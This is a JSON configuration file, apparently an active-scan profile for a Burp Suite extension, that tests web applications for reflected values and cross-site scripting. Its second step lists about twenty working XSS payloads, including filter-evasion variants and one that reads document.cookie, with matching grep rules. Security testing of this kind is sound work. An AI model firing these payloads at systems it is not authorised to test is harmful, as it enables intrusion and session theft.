[
  {
    "profile_name": "XSS",
    "enabled": true,
    "scanner": "active",
    "author": "@bountysecurity",
    "steps": [
      {
        "request_type": "original",
        "reuse_cookie": false,
        "insertion_point": "same",
        "raw_request": "",
        "payloads": [
          "true,TOKEN1337"
        ],
        "payloads_file": "",
        "payload_position": "replace",
        "change_http_request": false,
        "change_http_request_type": "post_to_get",
        "insertion_points": [
          "extension_provice",
          "entire_body",
          "param_body",
          "param_json",
          "url_path_folder",
          "param_multipart_attr",
          "user_provided",
          "param_url",
          "param_xml",
          "param_xml_attr",
          "url_path_filename",
          "entire_body_xml",
          "entire_body_multipart"
        ],
        "header_value": false,
        "new_headers": [],
        "match_replace": [],
        "encoder": [],
        "url_encode": false,
        "chars_to_url_encode": "",
        "greps_file": "",
        "grep": [
          "true,,Simple String,Not in Headers,TOKEN1337",
          "true,AND,Content Type,,text/html"
        ],
        "redir_type": "on_site",
        "max_redir": 5,
        "show_alert": "always",
        "issue_name": "Reflected Value",
        "issue_severity": "Information",
        "issue_confidence": "Firm",
        "issue_detail": "",
        "remediation_detail": "",
        "issue_background": "",
        "remediation_background": ""
      },
      {
        "request_type": "original",
        "reuse_cookie": false,
        "insertion_point": "same",
        "raw_request": "",
        "payloads": [
          "true,\u003c/script\u003e\u003cscript\u003econfirm(1)\u003c/script\u003e",
          "true,\"\u003e\u003cimg src\u003dx onerror\u003dprompt(1);\u003e",
          "true,\u003csvg/oNLoAd\u003dalert(1)\u003e",
          "true,\u003cmarquee loop\u003d1 width\u003d0 onfinish\u003dalert(2)\u003e",
          "true,\"\u003e\u003cScriPT\u003ea\u003d/XSS/.alert(a.source)\u003c/ScriPT\u003e",
          "true,\u003cscr\u003cscript\u003eipt\u003ealert(1)\u003c/scr\u003cscript\u003eipt\u003e",
          "true,\u003cscript\u003ealert(String.fromCharCode(88,83,83))\u003c/script\u003e",
          "true,\u003cdiv onpointerover\u003d\"alert(1)\"\u003exss\u003c/div\u003e",
          "true,\u003cvideo/poster/onerror\u003dalert(1)\u003e",
          "true,\u003csvg onload\u003d\u0027new Function`[\"XSS\"].find(al\\u0065rt)`\u0027\u003e",
          "true,\u003csvg onx\u003d() onload\u003d(confirm)(1)\u003e",
          "true,\u003cvideo src\u003d1 onerror\u003dalert(1)\u003e",
          "true,\u003caudio src\u003d1 onerror\u003dalert(1)\u003e",
          "true,\u003cBODY ONLOAD\u003dalert(\u0027XSS\u0027)\u003e",
          "true,\u003cimg src\u003dasdf onerror\u003dalert(document.cookie)\u003e",
          "true,\u003cembed src\u003d\"javascript:alert(1)\"\u003e",
          "true,\u003cframeset onload\u003dalert(123)\u003e",
          "true,\u003cDIV STYLE\u003d\"width: expression(alert(\u0027XSS\u0027));\"\u003e",
          "true,\u003cIFRAME SRC\u003d\"javascript:alert(\u0027XSS\u0027);\"\u003e\u003c/IFRAME\u003e",
          "true,\u003cimg src\u003d`xx:xx`onerror\u003dalert(1)\u003e"
        ],
        "payloads_file": "",
        "payload_position": "replace",
        "change_http_request": false,
        "change_http_request_type": "post_to_get",
        "insertion_points": [
          "extension_provice",
          "param_json",
          "url_path_folder",
          "param_multipart_attr",
          "param_name_body",
          "param_name_url",
          "user_provided",
          "param_xml",
          "param_xml_attr",
          "url_path_filename",
          "entire_body_xml",
          "entire_body_json",
          "entire_body_multipart"
        ],
        "header_value": false,
        "new_headers": [],
        "match_replace": [],
        "encoder": [],
        "url_encode": false,
        "chars_to_url_encode": "",
        "greps_file": "",
        "grep": [
          "true,,Simple String,Not in Headers,\u003c/script\u003e\u003cscript\u003econfirm(1)\u003c/script\u003e",
          "true,OR,Simple String,Not in Headers,\"\u003e\u003cimg src\u003dx onerror\u003dprompt(1);\u003e",
          "true,OR,Simple String,Not in Headers,\u003csvg/oNLoAd\u003dalert(1)\u003e",
          "true,OR,Simple String,Not in Headers,\u003cmarquee loop\u003d1 width\u003d0 onfinish\u003dalert(2)\u003e",
          "true,OR,Simple String,Not in Headers,\"\u003e\u003cScriPT\u003ea\u003d/XSS/.alert(a.source)\u003c/ScriPT\u003e",
          "true,OR,Simple String,Not in Headers,\u003cscr\u003cscript\u003eipt\u003ealert(1)\u003c/scr\u003cscript\u003eipt\u003e",
          "true,OR,Simple String,Not in Headers,\u003cscript\u003ealert(String.fromCharCode(88,83,83))\u003c/script\u003e",
          "true,OR,Simple String,Not in Headers,\u003cdiv onpointerover\u003d\"alert(1)\"\u003exss\u003c/div\u003e",
          "true,OR,Simple String,Not in Headers,\u003cvideo/poster/onerror\u003dalert(1)\u003e",
          "true,OR,Simple String,Not in Headers,\u003cimg src\u003d`xx:xx`onerror\u003dalert(1)\u003e",
          "true,OR,Simple String,Not in Headers,\u003csvg onload\u003d\u0027new Function`[\"XSS\"].find(al\\u0065rt)`\u0027\u003e",
          "true,OR,Simple String,Not in Headers,\u003csvg onx\u003d() onload\u003d(confirm)(1)\u003e",
          "true,OR,Simple String,Not in Headers,\u003cvideo src\u003d1 onerror\u003dalert(1)\u003e",
          "true,OR,Simple String,Not in Headers,\u003caudio src\u003d1 onerror\u003dalert(1)\u003e",
          "true,OR,Simple String,Not in Headers,\u003cBODY ONLOAD\u003dalert(\u0027XSS\u0027)\u003e",
          "true,OR,Simple String,Not in Headers,\u003cimg src\u003dasdf onerror\u003dalert(document.cookie)\u003e",
          "true,OR,Simple String,Not in Headers,\u003cembed src\u003d\"javascript:alert(1)\"\u003e",
          "true,OR,Simple String,Not in Headers,\u003cframeset onload\u003dalert(123)\u003e",
          "true,OR,Simple String,Not in Headers,\u003cDIV STYLE\u003d\"width: expression(alert(\u0027XSS\u0027));\"\u003e",
          "true,OR,Simple String,Not in Headers,\u003cIFRAME SRC\u003d\"javascript:alert(\u0027XSS\u0027);\"\u003e\u003c/IFRAME\u003e"
        ],
        "redir_type": "on_site",
        "max_redir": 5,
        "show_alert": "always",
        "issue_name": "XSS",
        "issue_severity": "Medium",
        "issue_confidence": "Certain",
        "issue_detail": "",
        "remediation_detail": "",
        "issue_background": "",
        "remediation_background": ""
      }
    ],
    "Tags": [
      "All",
      "XSS",
      "Fase 2"
    ]
  }
]